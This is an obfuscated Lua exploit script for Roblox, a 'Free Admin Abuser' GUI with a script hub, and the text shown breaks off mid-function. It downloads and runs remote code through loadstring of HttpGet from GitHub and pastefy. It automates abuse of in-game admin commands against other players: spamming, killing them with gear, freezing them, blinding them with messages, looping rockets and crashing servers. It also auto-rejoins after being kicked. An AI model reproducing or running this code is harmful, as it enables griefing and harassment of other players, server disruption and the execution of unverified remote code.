--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do do local v0=loadstring(game:HttpGet("https://raw.githubusercontent.com/shlexware/Orion/main/source"))();local v1=v0:MakeWindow({Name="Cool Gui V.1.0",IntroText="Cool Gui v.1.0",HidePremium=false,SaveConfig=true,ConfigFolder="Tutorial"});v0:MakeNotification({Name="Script succesfull",Content="Script has been worked properly",Image="rbxassetid://14028781153",Time=5});local v2=v1:MakeTab({Name="Universal Mod Tab",Icon="rbxassetid://14028781153",PremiumOnly=false});local v3=v1:MakeTab({Name="Mobile Mod Tab",Icon="rbxassetid://14028781153",PremiumOnly=false});local v4=v1:MakeTab({Name="Script Hub",Icon="rbxassetid://14028781153",PremiumOnly=false});local v5=v4:AddSection({Name="Warning❗ , some script in script hub is inappropiate , so if your account get banned , dont blame my script "});v4:AddButton({Name="(FE) Chat Hack",Callback=function()loadstring(game:HttpGet("https://pastefy.ga/zCFEwaYq/raw",true))();end});v4:AddButton({Name="(FE) Free Admin Abuser",Callback=function()function GetPlr(v193)local v194=0;local v195;local v196;local v197;while true do if (v194==1) then v197=nil;while true do local v296=0;local v297;while true do if (v296==0) then v297=0;while true do if (v297==0) then if (v296==1) then local v373=0;while true do if (0==v373) then if (v197=="others") then for v403,v404 in pairs(game.Players:GetPlayers()) do if (v404.Name~=game.Players.LocalPlayer.Name) then table.insert(v196,v404.Name);end end else for v405,v406 in pairs(game.Players:GetPlayers()) do if (v406.Name~=game.Players.LocalPlayer.Name) then if (v406.Name:lower():sub(1, #v193)==v193:lower()) then table.insert(v196,v406.Name);end end end end return v196;end end end if (v296==0) then local v374=0;while true do if (v374==0) then v196={};v197=v193:lower();v374=1;end if (v374==1) then v296=1;break;end end end break;end end break;end end end break;end if (v194==0) then v195=0;v196=nil;v194=1;end end end function GetPlayer(v198)local v199=0;local v200;local v201;while true do if (v199==0) then local v295=0;while true do if (v295==1) then v199=1;break;end if (v295==0) then v200={};v201=v198:lower();v295=1;end end end if (v199==1) then if (v201=="all") then for v316,v317 in pairs(game.Players:GetPlayers()) do table.insert(v200,v317.Name);end elseif (v201=="others") then for v334,v335 in pairs(game.Players:GetPlayers()) do if (v335.Name~=game.Players.LocalPlayer.Name) then table.insert(v200,v335.Name);end end elseif (v201=="me") then for v358,v359 in pairs(game.Players:GetPlayers()) do if (v359.Name==game.Players.LocalPlayer.Name) then table.insert(v200,v359.Name);end end else for v360,v361 in pairs(game.Players:GetPlayers()) do if (v361.Name:lower():sub(1, #v198)==v198:lower()) then table.insert(v200,v361.Name);end end end return v200;end end end local v7;local v8=game:GetService("Players").LocalPlayer;getgenv().rejoin=game:GetService("CoreGui").RobloxPromptGui.promptOverlay.ChildAdded:Connect(function(v202)if ((v202.Name=="ErrorPrompt") and v202:FindFirstChild("MessageArea") and v202.MessageArea:FindFirstChild("ErrorFrame")) then game:GetService("TeleportService"):Teleport(game.PlaceId,v8);end end);spawn(function()while wait() do if (game.StarterGui:GetCoreGuiEnabled("Chat")==false) then game:GetService("StarterGui"):SetCoreGuiEnabled("Chat",true);end end end);function Notify(v203,v204,v205)local v206=Instance.new("ScreenGui");local v207=Instance.new("Frame",v206);local v208=Instance.new("TextLabel",v207);local v209=Instance.new("TextLabel",v207);v206.Name="Notification";v206.Parent=game.CoreGui;v207.Name="MainFrame";v207.BackgroundColor3=Color3.new(0,0,0);v207.BorderColor3=Color3.new(255,0,0);v207.BorderSizePixel=0;v207.Position=UDim2.new(1,5,0,50);v207.Size=UDim2.new(0,330,0,100);v208.BackgroundColor3=Color3.new(0,0,0);v208.BackgroundTransparency=0.8;v208.Size=UDim2.new(1,0,0,30);v208.Font=Enum.Font.SourceSansSemibold;v208.Text=v203;v208.BorderColor3=Color3.new(255,0,0);v208.TextColor3=Color3.new(255,0,0);v208.TextSize=17;local v228=5;local v229=tick;local v230=Color3.fromHSV;local v231=game:GetService("RunService");spawn(function()v231:BindToRenderStep("Rainbow",1000,function()local v281=0;local v282;local v283;local v284;while true do if (v281==0) then v282=0;v283=nil;v281=1;end if (v281==1) then v284=nil;while true do if (v282==1) then v208.TextColor3=v284;break;end if (v282==0) then local v337=0;while true do if (v337==1) then v282=1;break;end if (v337==0) then v283=(v229()%v228)/v228 ;v284=v230(v283,1,1);v337=1;end end end end break;end end end);end);spawn(function()while wait() do local v285=0;local v286;while true do if (v285==0) then v286=0;while true do if (v286==0) then local v338=0;while true do if (0==v338) then v208.Font=Enum.Font.SourceSans;wait(0.1);v338=1;end if (v338==1) then v286=1;break;end end end if (v286==3) then v208.Font=Enum.Font.Antique;wait(0.1);v286=4;end if (v286==1) then v208.Font=Enum.Font.Bodoni;wait(0.1);v286=2;end if (v286==4) then v208.Font=Enum.Font.Fantasy;break;end if (v286==2) then v208.Font=Enum.Font.Arcade;wait(0.1);v286=3;end end break;end end end end);v209.BackgroundColor3=Color3.new(0,0,0);v209.BackgroundTransparency=1;v209.Position=UDim2.new(0,0,0,30);v209.Size=UDim2.new(1,0,1, -30);v209.Font=Enum.Font.Gotham;v209.BorderColor3=Color3.new(255,0,0);v209.Text=v204;v209.TextColor3=Color3.new(255,0,0);v209.TextSize=16;v209.TextWrapped=true;local v243=Instance.new("Sound");v243.Parent=game:GetService("SoundService");v243.SoundId="rbxassetid://9086208751";v243.Volume=5;v243.Looped=false;wait(0.1);v243:Play();spawn(function()local v266=0;local v267;while true do if (v266==0) then v267=0;while true do if (v267==1) then local v319=0;while true do if (v319==1) then v267=2;break;end if (v319==0) then v207:TweenPosition(UDim2.new(1,5,0,50),"Out","Sine",0.5);wait(0.6);v319=1;end end end if (0==v267) then local v320=0;local v321;while true do if (v320==0) then v321=0;while true do if (0==v321) then v207:TweenPosition(UDim2.new(1, -330,0,50),"Out","Sine",0.5);wait(v205);v321=1;end if (v321==1) then v267=1;break;end end break;end end end if (v267==2) then v206:Destroy();break;end end break;end end end);end local v10=game.Players.LocalPlayer.PlayerGui;local v11=v10:FindFirstChild("HDAdminGUIs");if v11 then local v268=0;local v269;local v270;local v271;local v272;local v273;while true do if (v268==2) then v273=nil;while true do if (v269==0) then local v322=0;while true do if (v322==0) then v270=0;v271=nil;v322=1;end if (v322==1) then v269=1;break;end end end if (2==v269) then while true do if (v270==1) then local v362=0;while true do if (v362==0) then v272:CaptureFocus();task.wait(0.1);v362=1;end if (1==v362) then v270=2;break;end end end if (v270==2) then local v363=0;while true do if (v363==1) then v270=3;break;end if (0==v363) then v272.Text=AdminPrefix;task.wait(0.1);v363=1;end end end if (v270==3) then local v364=0;while true do if (v364==1) then v270=4;break;end if (v364==0) then v273=game:GetService("VirtualUser");v273:SetKeyDown("0x0D");v364=1;end end end if (v270==4) then task.wait();v273:SetKeyUp("0x0D");break;end if (v270==0) then local v365=0;while true do if (v365==1) then v270=1;break;end if (v365==0) then v271=v11.MainFrame.Pages.Settings;v272=v271.Custom["AE1 Prefix"].SettingValue.TextBox;v365=1;end end end end break;end if (v269==1) then v272=nil;v273=nil;v269=2;end end break;end if (v268==0) then v269=0;v270=nil;v268=1;end if (v268==1) then v271=nil;v272=nil;v268=2;end end end local v12=Instance.new("ScreenGui");local v13=Instance.new("Frame");local v14=Instance.new("TextLabel");local v15=Instance.new("TextButton");local v16=Instance.new("TextButton");local v17=Instance.new("TextButton");local v18=Instance.new("TextButton");local v19=Instance.new("TextButton");local v20=Instance.new("TextButton");local v21=Instance.new("TextBox");local v22=Instance.new("TextBox");local v23=Instance.new("TextButton");Players=game:GetService("Players");v12.Parent=game:GetService("CoreGui");v12.ResetOnSpawn=false;v13.Name="Main";v13.Parent=v12;v13.BackgroundColor3=Color3.new(0,0,0);v13.BorderSizePixel=4;v13.Position=UDim2.new(0.117575757,0,0.152334154,0);v13.Size=UDim2.new(0,334,0,334);v13.Active=true;v13.Draggable=true;v14.Name="Title";v14.Parent=v13;v14.BackgroundColor3=Color3.new(255,0,0);v14.BackgroundTransparency=1;v14.BorderColor3=Color3.new(0,0,0);v14.Position=UDim2.new(0.0109580846,0,0.9,0);v14.Size=UDim2.new(0,162,0,50);v14.Font=Enum.Font.Highway;v14.Text="Getting Time";v14.TextColor3=Color3.new(1,1,1);v14.TextSize=14;v14.TextStrokeColor3=Color3.new(0,0,0);v14.TextWrapped=true;v15.Name="Title2";v15.Parent=v13;v15.BackgroundColor3=Color3.new(255,0,0);v15.BackgroundTransparency=1;v15.BorderColor3=Color3.new(0,0,0);v15.Position=UDim2.new(0.514970064,0,0.9,0);v15.Size=UDim2.new(0,162,0,50);v15.Font=Enum.Font.Highway;v15.Text="LoudRandomMusic";v15.TextColor3=Color3.new(255,0,0);v15.TextSize=14;v15.TextStrokeColor3=Color3.new(0,0,0);v15.TextWrapped=true;v16.Name="Mute";v16.Parent=v13;v16.BackgroundColor3=Color3.new(255,0,0);v16.BorderColor3=Color3.new(0,0,0);v16.Position=UDim2.new(0.0209580846,0,0.594202876,0);v16.Size=UDim2.new(0,162,0,50);v16.Font=Enum.Font.Gotham;v16.Text="Loop (cmd) nil (string)";v16.TextColor3=Color3.new(1,1,1);v16.TextSize=14;v16.TextStrokeColor3=Color3.new(1,1,1);v16.TextWrapped=true;v17.Name="AllCMD";v17.Parent=v13;v17.BackgroundColor3=Color3.new(255,0,0);v17.BorderColor3=Color3.new(0,0,0);v17.Position=UDim2.new(0.514970064,0,0.594202876,0);v17.Size=UDim2.new(0,152,0,50);v17.Font=Enum.Font.Gotham;v17.Text="(cmd) nil";v17.TextColor3=Color3.new(1,1,1);v17.TextSize=14;v17.TextStrokeColor3=Color3.new(1,1,1);v17.TextWrapped=true;v18.Name="LoopCMD";v18.Parent=v13;v18.BackgroundColor3=Color3.new(255,0,0);v18.BorderColor3=Color3.new(0,0,0);v18.Position=UDim2.new(0.0209580846,0,0.794202876,0);v18.Size=UDim2.new(0,152,0,50);v18.Font=Enum.Font.Gotham;v18.Text="Loop (cmd) nil";v18.TextColor3=Color3.new(1,1,1);v18.TextSize=14;v18.TextStrokeColor3=Color3.new(1,1,1);v18.TextWrapped=true;v19.Name="DestructCMD";v19.Parent=v13;v19.BackgroundColor3=Color3.new(255,0,0);v19.BorderColor3=Color3.new(0,0,0);v19.Position=UDim2.new(0.514970064,0,0.794202876,0);v19.Size=UDim2.new(0,152,0,50);v19.Font=Enum.Font.Gotham;v19.Text="(cmd) nil (string)";v19.TextColor3=Color3.new(1,1,1);v19.TextSize=14;v19.TextStrokeColor3=Color3.new(1,1,1);v19.TextWrapped=true;v20.Name="SpamCMD";v20.Parent=v13;v20.BackgroundColor3=Color3.new(255,0,0);v20.BorderColor3=Color3.new(0,0,0);v20.Position=UDim2.new(0.514970064,0,0.394202876,0);v20.Size=UDim2.new(0,152,0,50);v20.Font=Enum.Font.Gotham;v20.Text="Spam (cmd)";v20.TextColor3=Color3.new(1,1,1);v20.TextSize=14;v20.TextStrokeColor3=Color3.new(1,1,1);v20.TextWrapped=true;v21.Name="TextBox";v21.Parent=v13;v21.BackgroundColor3=Color3.new(0,0,0);v21.BorderColor3=Color3.new(255,0,0);v21.Position=UDim2.new(0.0209580846,0,0.159420297,0);v21.Size=UDim2.new(0,317,0,50);v21.ClearTextOnFocus=false;v21.Font=Enum.Font.Gotham;v21.PlaceholderColor3=Color3.new(255,0,0);v21.PlaceholderText="Command";v21.Text="";v21.TextColor3=Color3.new(255,255,255);v21.TextScaled=true;v21.TextSize=30;v21.TextWrapped=true;v22.Name="TextBox2";v22.Parent=v13;v22.BackgroundColor3=Color3.new(0,0,0);v22.BorderColor3=Color3.new(255,0,0);v22.Position=UDim2.new(0.0209580846,0,0.394202876,0);v22.Size=UDim2.new(0,152,0,50);v22.ClearTextOnFocus=false;v22.Font=Enum.Font.Gotham;v22.PlaceholderColor3=Color3.new(255,0,0);v22.PlaceholderText="String";v22.Text="";v22.TextColor3=Color3.new(255,255,255);v22.TextScaled=true;v22.TextSize=14;v22.TextWrapped=true;v23.Name="Exit";v23.Parent=v13;v23.BackgroundColor3=Color3.new(255,0,0);v23.BorderColor3=Color3.new(0,0,0);v23.BorderSizePixel=0;v23.Position=UDim2.new(0.952095807,0,0,0);v23.Size=UDim2.new(0,16,0,16);v23.Font=Enum.Font.Bodoni;v23.Text="X";v23.TextColor3=Color3.new(0,0,0);v23.TextScaled=true;v23.TextSize=14;v23.TextWrapped=true;local v166={"6911766512","6781116057","5216738441","6819593773","6846153394"};local v167=game:GetService("Players");local v168=v167.LocalPlayer;local v169=v168.Name;local v170=false;local v171=false;local v172=false;local v173=1.5;local function v174()return  #v167:GetPlayers();end spawn(function()while wait() do local v274=0;local v275;while true do if (0==v274) then v275=0;while true do if (v275==0) then v7=v174();v14.Text="PlayerInGame:"   .. v7 ;break;end end break;end end end end);v16.MouseButton1Click:Connect(function()local v248=0;local v249;local v250;while true do if (v248==0) then v249=0;v250=nil;v248=1;end if (v248==1) then while true do if (v249==0) then v250=0;while true do if (v250==0) then v171= not v171;v170=false;v250=1;end if (v250==1) then v172=false;if AffectAllPlayer then spawn(function()while wait(v7) and v171  do for v385,v386 in pairs(v167:GetPlayers()) do game.Players:Chat(hider   .. AdminPrefix   .. v21.Text   .. " "   .. v386.Name   .. " "   .. v22.Text );end end end);else spawn(function()while wait(v7) and v171  do for v387,v388 in pairs(v167:GetPlayers()) do if (v388.Name~=v169) then game.Players:Chat(hider   .. AdminPrefix   .. v21.Text   .. " "   .. v388.Name   .. " "   .. v22.Text );end end end end);end break;end end break;end end break;end end end);v17.MouseButton1Click:Connect(function()local v251=0;local v252;while true do if (v251==0) then v252=0;while true do if (v252==1) then v170=false;for v324,v325 in pairs(v167:GetPlayers()) do if AffectAllPlayer then game.Players:Chat(hider   .. AdminPrefix   .. v21.Text   .. " "   .. v325.Name );elseif (v325.Name~=v169) then game.Players:Chat(hider   .. AdminPrefix   .. v21.Text   .. " "   .. v325.Name );end end break;end if (v252==0) then v172=false;v171=false;v252=1;end end break;end end end);v18.MouseButton1Click:Connect(function()local v253=0;local v254;local v255;while true do if (v253==1) then while true do if (v254==0) then v255=0;while true do if (v255==0) then local v352=0;local v353;while true do if (v352==0) then v353=0;while true do if (v353==0) then local v396=0;while true do if (v396==1) then v353=1;break;end if (v396==0) then v170= not v170;v172=false;v396=1;end end end if (v353==1) then v255=1;break;end end break;end end end if (v255==1) then v171=false;if AffectAllPlayer then spawn(function()while wait(v7) and v170  do for v389,v390 in pairs(v167:GetPlayers()) do game.Players:Chat(hider   .. AdminPrefix   .. v21.Text   .. " "   .. v390.Name );end end end);else spawn(function()while wait(v7) and v170  do for v391,v392 in pairs(v167:GetPlayers()) do if (v392.Name~=v169) then game.Players:Chat(hider   .. AdminPrefix   .. v21.Text   .. " "   .. v392.Name );end end end end);end break;end end break;end end break;end if (v253==0) then v254=0;v255=nil;v253=1;end end end);v19.MouseButton1Click:Connect(function()local v256=0;local v257;while true do if (v256==0) then v257=0;while true do if (v257==1) then v171=false;for v326,v327 in pairs(v167:GetPlayers()) do if AffectAllPlayer then game.Players:Chat(hider   .. AdminPrefix   .. v21.Text   .. " "   .. v327.Name   .. " "   .. v22.Text );elseif (v327.Name~=v169) then game.Players:Chat(hider   .. AdminPrefix   .. v21.Text   .. " "   .. v327.Name   .. " "   .. v22.Text );end end break;end if (0==v257) then v172=false;v170=false;v257=1;end end break;end end end);v20.MouseButton1Click:Connect(function()v172= not v172;v171=false;v170=false;spawn(function()while wait(v173) and v172  do game.Players:Chat(hider   .. AdminPrefix   .. v21.Text );end end);end);local v175;v175=game:GetService("RunService").Heartbeat:Connect(function()local v258=0;while true do if (v258==0) then if v172 then v20.Text="Click to Stop Loop";else v20.Text="Spam (cmd)";end if AffectAllPlayer then local v309=0;local v310;local v311;while true do if (v309==1) then while true do if (v310==0) then v311=0;while true do if (v311==0) then if v170 then v18.Text="Click to Stop Loop";else v18.Text="Loop (cmd) all";end if v171 then v16.Text="Click to Stop Loop";else v16.Text="Loop (cmd) all (string)";end break;end end break;end end break;end if (v309==0) then v310=0;v311=nil;v309=1;end end else local v312=0;local v313;while true do if (v312==0) then v313=0;while true do if (v313==0) then if v170 then v18.Text="Click to Stop Loop";else v18.Text="Loop (cmd) others";end if v171 then v16.Text="Click to Stop Loop";else v16.Text="Loop (cmd) others (string)";end break;end end break;end end end break;end end end);v15.MouseButton1Click:Connect(function()local v259=0;local v260;local v261;while true do if (1==v259) then while true do if (v260==0) then v261=0;while true do if (v261==0) then game.Players:Chat(hider   .. AdminPrefix   .. "music "   .. v166[math.random( #v166)] );game.Players:Chat(hider   .. AdminPrefix   .. "volume 1000" );break;end end break;end end break;end if (v259==0) then v260=0;v261=nil;v259=1;end end end);if AffectAllPlayer then local v276=0;while true do if (v276==1) then v17.Text="(cmd) all";v16.Text="Loop (cmd) all (string)";break;end if (v276==0) then local v300=0;while true do if (0==v300) then v19.Text="(cmd) all (string)";v18.Text="Loop (cmd) all";v300=1;end if (1==v300) then v276=1;break;end end end end else local v277=0;local v278;while true do if (v277==0) then v278=0;while true do if (v278==0) then local v330=0;while true do if (v330==1) then v278=1;break;end if (v330==0) then v19.Text="(cmd) others (string)";v18.Text="Loop (cmd) others";v330=1;end end end if (v278==1) then v17.Text="(cmd) others";v16.Text="Loop (cmd) others (string)";break;end end break;end end end local v176;v176=true;local v177=true;local v178;function ClearTools()pcall(function()local v279=0;local v280;while true do if (0==v279) then v280=0;while true do if (v280==0) then for v347,v348 in pairs(v168.Character:GetDescendants()) do if v348:IsA("Tool") then v348:Destroy();end end for v349,v350 in pairs(v168.Backpack:GetDescendants()) do if v350:IsA("Tool") then v350:Destroy();end end break;end end break;end end end);end function ActivateTools()pcall(function()for v287,v288 in pairs(v168.Character:GetDescendants()) do if v288:IsA("Tool") then local v301=0;while true do if (v301==0) then repeat wait();until v288~=nil  v288:Activate();break;end end end end end);end function EquipTools()pcall(function()for v289,v290 in pairs(v168.Backpack:GetDescendants()) do if v290:IsA("Tool") then repeat wait();until v290~=nil  v290.Parent=v168.Character;end end end);end function UnequipTools()pcall(function()for v291,v292 in pairs(v168.Character:GetDescendants()) do if v292:IsA("Tool") then local v304=0;local v305;while true do if (v304==0) then v305=0;while true do if (v305==0) then repeat wait();until v292~=nil  v292.Parent=v168.Backpack;break;end end break;end end end end end);end local v179=true;local v180=false;local v181=false;local v182=false;local v183=false;v178=v168.Chatted:Connect(function(v262)if (v262:sub(1,11)==(AdminPrefix   .. "customcmds")) then local v293=0;local v294;while true do if (v293==0) then v294=0;while true do if (0==v294) then print("[[
         
// Meaning of each words //
(prefix)
[Means what symbol called at first line]
(un-cmd)
[Means it could be stopped or started deciding with cmd or uncmd]
(name, other, all me)
[Could be used on other people or yourself]

  // List of custom commands //

[prefix(spamtime) (number)]
Sets the spam cmd button delay, if number lower than 1 it would be broken

[prefix(un-mblind)] blind people with message, very annoying (cmd used : sm m)

[prefix(slash) (name), other] Makes them killed by a gear (cmds used : gear me)

[prefix(rocket) (name) other, all, me] KABOOM PEOPLE WITH ROCKETS (cmds used : gear me)

[prefix(un-chaos)] Makes the server chaos by lateral rockets everywhere (cmds used : gear me)

[prefix(un-spamturkey)] Spams turkey as you like and unclearable like these exists by itself (cmds used : gear me) (CANNOT BE AVOID BY CLEAR COMMAND)

[prefix(un-spamclone)] If you watch anime you will know, spams stupid clones that walk everywhere (cmds used : gear me) (CANNOT BE AVOID BY CLEAR COMMAND)

[prefix(zawarudo)] freezes others and play a zawarudo sound (cmds used : music, freeze)

[prefix(stun) (name), other] Makes them stunned by laser electrocution yes (cmds used : gear me)

(COMMANDS THAT WORK ONLY ON FREE ADMIN GAME WITH 5K PLAYERS PLUS)

// COMMANDS ONLY FOR FREE ADMIN //

[prefix(crash)] make the game unplayable (cmds used : nothing only fireclickdetector, works on free admin only)

]]");Notify("Fedoratum Admin Abuser","Type /console to check customcmds",4);break;end end break;end end elseif (v262:sub(1,7)==(AdminPrefix   .. "mblind")) then local v306=0;while true do if (2==v306) then v177=true;if v176 then local v354=0;local v355;while true do if (v354==0) then v355=0;while true do if (0==v355) then v176=false;spawn(function()while v177 and wait(2.3)  do game.Players:Chat(hider   .. AdminPrefix   .. "m "   .. AdminPrefix   .. "sm" );end end);break;end end break;end end end break;end if (v306==1) then v172=false;v176=true;v306=2;end if (v306==0) then local v333=0;while true do if (1==v333) then v306=1;break;end if (v333==0) then v170=false;v171=false;v333=1;end end end end elseif (v262:sub(1,9)==(AdminPrefix   .. "unmblind")) then local v318=0;while true do if (v318==0) then v177=false;v176=true;break;end end elseif (v262:sub(1,8)==(AdminPrefix   .. "unchaos")) then local v351=0;while true do if (v351==0) then v180=false;ClearTools();break;end end elseif (v262:sub(1,6)==(AdminPrefix   .. "chaos")) then local v370=0;while true do if (v370==0) then local v383=0;while true do if (v383==0) then v172=false;v171=false;v383=1;end if (v383==1) then v370=1;break;end end end if (v370==2) then local v384=0;while true do if (v384==1) then v370=3;break;end if (v384==0) then v182=false;v183=false;v384=1;end end end if (1==v370) then v170=false;v172=false;v370=2;end if (v370==3) then pcall(function()local v393=0;while true do if (1==v393) then task.wait(1.5);spawn(function()while wait() and v180  do v168.Backpack.RocketJumper.FireRocket:FireServer(Vector3.new(math.random( -200,200),math.random(0,200),math.random( -200,200)),Vector3.new(math.random( -200,200),math.random(0,50),math.random( -200,200)));if (v180==false) then break;end end end);break;end if (v393==0) then local v402=0;while true do if (v402==1) then v393=1;break;end if (v402==0) then v180=true;game.Players:Chat(hider   .. AdminPrefix   .. "gear "   .. v169   .. " 169602103" );v402=1;end end end end end);break;end end elseif (v262:sub(1,9)==(AdminPrefix   .. "spamtime")) then v173=tostring(v262:sub(11));elseif (v262:sub(1,6)==(AdminPrefix   .. "slash")) then local v394=0;local v395;while true do if (v394==0) then v395=0;while true do if (v395==0) then local v410=0;while true do if (v410==1) then v395=1;break;end if (0==v410) then v170=false;v171=false;v410=1;end end end if (v395==1) then local v411=0;while true do if (v411==1) then v395=2;break;end if (v411==0) then local v418=0;while true do if (v418==1) then v411=1;break;end if (v418==0) then v172=false;v182=false;v418=1;end end end end end if (2==v395) then local v412=0;while true do if (v412==1) then v395=3;break;end if (v412==0) then v183=false;v180=false;v412=1;end end end if (v395==3) then pcall(function()local v414=0;while true do if (v414==2) then local v421=0;while true do if (v421==0) then task.wait(1.5);EquipTools();v421=1;end if (v421==1) then v414=3;break;end end end if (v414==1) then task.wait(1.5);game.Players:Chat(hider   .. AdminPrefix   .. "gear "   .. v169   .. " 68539623" );v414=2;end if (v414==3) then local v422=0;while true do if (v422==1) then v414=4;break;end if (v422==0) then for v433,v434 in pairs(GetPlr(tostring(v262:sub(8)))) do if game.Players[v434].Character then spawn(function()while wait() do if (game.Players[v434].Character:FindFirstChild("HumanoidRootPart")~=nil) then local v450=0;local v451;while true do if (v450==0) then v451=0;while true do if (0==v451) then ActivateTools();game.Players[v434].Character.HumanoidRootPart.CFrame=v168.Character.HumanoidRootPart.CFrame * CFrame.new(1,0, -2) ;break;end end break;end end end if v181 then break;end end end);end end task.wait(2);v422=1;end end end if (v414==4) then ClearTools();v181=true;break;end if (v414==0) then v181=false;ClearTools();v414=1;end end end);break;end end break;end end elseif (v262:sub(1,9)==(AdminPrefix   .. "zawarudo")) then local v401=0;while true do if (v401==3) then task.wait(1);game.Players:Chat(hider   .. AdminPrefix   .. "music 0" );break;end if (v401==1) then v172=false;v171=false;v170=false;v401=2;end if (v401==2) then local v409=0;while true do if (v409==0) then game.Players:Chat(hider   .. AdminPrefix   .. "music 5129686200" );task.wait(4);v409=1;end if (v409==1) then for v419,v420 in pairs(v167:GetPlayers()) do if (v420.Name~=v169) then game.Players:Chat(hider   .. AdminPrefix   .. "freeze "   .. v420.Name );end end v401=3;break;end end end if (v401==0) then v183=false;v182=false;v180=false;v401=1;end end elseif (v262:sub(1,5)==(AdminPrefix   .. "stun")) then local v407=0;local v408;while true do if (0==v407) then v408=0;while true do if (v408==1) then local v423=0;while true do if (v423==1) then v408=2;break;end if (v423==0) then local v432=0;while true do if (v432==0) then v172=false;v182=false;v432=1;end if (v432==1) then v423=1;break;end end end end end if (v408==3) then pcall(function()local v428=0;local v429;local v430;while true do if (v428==1) then while true do if (0==v429) then v430=0;while true do if (v430==0) then local v452=0;while true do if (v452==1) then v430=1;break;end if (v452==0) then v181=false;ClearTools();v452=1;end end end if (v430==4) then ClearTools();v181=true;break;end if (v430==3) then for v454,v455 in pairs(GetPlr(tostring(v262:sub(7)))) do if game.Players[v455].Character then spawn(function()while wait() do if (game.Players[v455].Character:FindFirstChild("HumanoidRootPart")~=nil) then ActivateTools();game.Players[v455].Character.HumanoidRootPart.CFrame=v168.Character.HumanoidRootPart.CFrame * CFrame.new(1,0, -2) ;if v181 then break;end end end end);end end task.wait(2);v430=4;end if (v430==2) then local v453=0;while true do if (0==v453) then task.wait(1.5);EquipTools();v453=1;end if (1==v453) then v430=3;break;end end end if (v430==1) then task.wait(1.5);game.Players:Chat(hider   .. AdminPrefix   .. "gear "   .. v169   .. " 82357123" );v430=2;end end break;end end break;end if (v428==0) then v429=0;v430=nil;v428=1;end end end);break;end if (0==v408) then local v424=0;while true do if (v424==0) then v170=false;v171=false;v424=1;end if (v424==1) then v408=1;break;end end end if (2==v408) then local v425=0;while true do if (v425==0) then v183=false;v180=false;v425=1;end if (v425==1) then v408=3;break;end end end end break;end end elseif (v262:sub(1,13)==(AdminPrefix   .. "unspamturkey")) then local v413=0;while true do if (v413==0) then v182=false;ClearTools();break;end end elseif (v262:sub(1,12)==(AdminPrefix   .. "unspamclone")) then local v415=0;local v416;local v417;while true do if (v415==0) then v416=0;v417=nil;v415=1;end if (v415==1) then while true do if (0==v416) then v417=0;while true do if (v417==1) then task.wait(1);ClearTools();break;end if (v417==0) then local v442=0;local v443;while true do if (v442==0) then v443=0;while true do if (v443==0) then v183=false;UnequipTools();v443=1;end if (v443==1) then v417=1;break;end end break;end end end end break;end end break;end end elseif (v262:sub(1,11)==(AdminPrefix   .. "spamturkey")) then local v426=0;local v427;while true do if (v426==0) then v427=0;while true do if (v427==3) then local v436=0;local v437;while true do if (0==v436) then v437=0;while true do if (v437==1) then v427=4;break;end if (0==v437) then ClearTools();task.wait(1);v437=1;end end break;end end end if (v427==1) then local v438=0;while true do if (v438==0) then v170=false;v172=false;v438=1;end if (1==v438) then v427=2;break;end end end if (v427==4) then spawn(function()while wait() and v182  do local v446=0;local v447;local v448;while true do if (v446==0) then v447=0;v448=nil;v446=1;end if (v446==1) then while true do if (v447==0) then v448=0;while true do if (v448==0) then local v469=0;local v470;while true do if (0==v469) then v470=0;while true do if (v470==0) then local v479=0;while true do if (v479==0) then game.Players:Chat(hider   .. AdminPrefix   .. "gear "   .. v169   .. " 40504724" );task.wait(1.5);v479=1;end if (v479==1) then v470=1;break;end end end if (v470==1) then v448=1;break;end end break;end end end if (v448==3) then local v471=0;local v472;while true do if (0==v471) then v472=0;while true do if (0==v472) then ActivateTools();ActivateTools();v472=1;end if (1==v472) then v448=4;break;end end break;end end end if (2==v448) then local v473=0;local v474;while true do if (v473==0) then v474=0;while true do if (v474==0) then ActivateTools();ActivateTools();v474=1;end if (v474==1) then v448=3;break;end end break;end end end if (4==v448) then task.wait(0.3);ClearTools();break;end if (v448==1) then local v475=0;local v476;while true do if (v475==0) then v476=0;while true do if (v476==0) then EquipTools();task.wait(0.3);v476=1;end if (v476==1) then v448=2;break;end end break;end end end end break;end end break;end end end end);break;end if (v427==0) then local v439=0;while true do if (v439==1) then v427=1;break;end if (v439==0) then v182=true;v171=false;v439=1;end end end if (v427==2) then local v440=0;local v441;while true do if (0==v440) then v441=0;while true do if (v441==1) then v427=3;break;end if (0==v441) then v183=false;v180=false;v441=1;end end break;end end end end break;end end elseif (v262:sub(1,10)==(AdminPrefix   .. "spamclone")) then local v431=0;while true do if (v431==2) then v182=false;v180=false;v431=3;end if (1==v431) then v170=false;v172=false;v431=2;end if (v431==0) then v183=true;v171=false;v431=1;end if (3==v431) then ClearTools();task.wait(1);v431=4;end if (4==v431) then spawn(function()while wait() and v183  do local v444=0;while true do if (1==v444) then ActivateTools();ActivateTools();ActivateTools();ActivateTools();v444=2;end if (v444==0) then game.Players:Chat(hider   .. AdminPrefix   .. "gear "   .. v169   .. " 72644644" );task.wait(1.5);EquipTools();task.wait(0.3);v444=1;end if (v444==2) then task.wait(0.3);UnequipTools();task.wait(1);ClearTools();break;end end end end);break;end end elseif (v262:sub(1,7)==(AdminPrefix   .. "rocket")) then local v435=0;while true do if (v435==0) then local v445=0;while true do if (v445==0) then v170=false;v171=false;v445=1;end if (v445==1) then v435=1;break;end end end if (v435==1) then v172=false;v182=false;v435=2;end if (v435==2) then v183=false;pcall(function()local v449=0;while true do if (v449==2) then local v456=0;while true do if (0==v456) then task.wait(4);v179=false;v456=1;end if (v456==1) then v449=3;break;end end end if (v449==0) then local v457=0;while true do if (v457==1) then v449=1;break;end if (0==v457) then v179=true;game.Players:Chat(hider   .. AdminPrefix   .. "gear "   .. v169   .. " 169602103" );v457=1;end end end if (v449==3) then ClearTools();break;end if (v449==1) then task.wait(1.5);for v460,v461 in pairs(GetPlayer(tostring(v262:sub(9)))) do if (game.Players[v461].Character:FindFirstChild("HumanoidRootPart")~=nil) then spawn(function()while wait() and v179  